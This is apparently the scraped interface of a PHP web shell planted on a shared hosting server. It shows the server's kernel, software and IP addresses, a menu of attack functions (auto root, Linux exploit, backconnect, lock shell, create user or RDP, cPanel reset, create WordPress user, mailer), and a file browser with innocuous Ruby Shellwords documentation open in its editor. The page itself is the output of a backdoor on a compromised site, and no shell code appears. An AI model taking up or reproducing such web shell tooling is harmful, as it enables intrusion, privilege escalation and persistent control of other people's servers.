Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.179
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
Shellwords /
[ HOME SHELL ]
Name
Size
Permission
Action
cdesc-Shellwords.yaml
1.12
KB
-rw-r--r--
escape-i.yaml
234
B
-rw-r--r--
join-i.yaml
230
B
-rw-r--r--
shellescape-i.yaml
839
B
-rw-r--r--
shelljoin-i.yaml
726
B
-rw-r--r--
shellsplit-i.yaml
829
B
-rw-r--r--
shellwords-i.yaml
242
B
-rw-r--r--
split-i.yaml
232
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shelljoin-i.yaml
--- !ruby/object:RI::MethodDescription aliases: - !ruby/object:RI::AliasName name: join block_params: comment: - !ruby/struct:SM::Flow::P body: Builds a command line string from an argument list <tt>array</tt> joining all elements escaped for Bourne shell and separated by a space. - !ruby/struct:SM::Flow::VERB body: " open('|' + Shellwords.join(['grep', pattern, *files])) { |pipe|\n # ...\n }\n" - !ruby/struct:SM::Flow::P body: +Array#shelljoin+ is a shorthand for this function. - !ruby/struct:SM::Flow::VERB body: " open('|' + ['grep', pattern, *files].shelljoin) { |pipe|\n # ...\n }\n" full_name: Shellwords#shelljoin is_singleton: false name: shelljoin params: (array) visibility: public
Close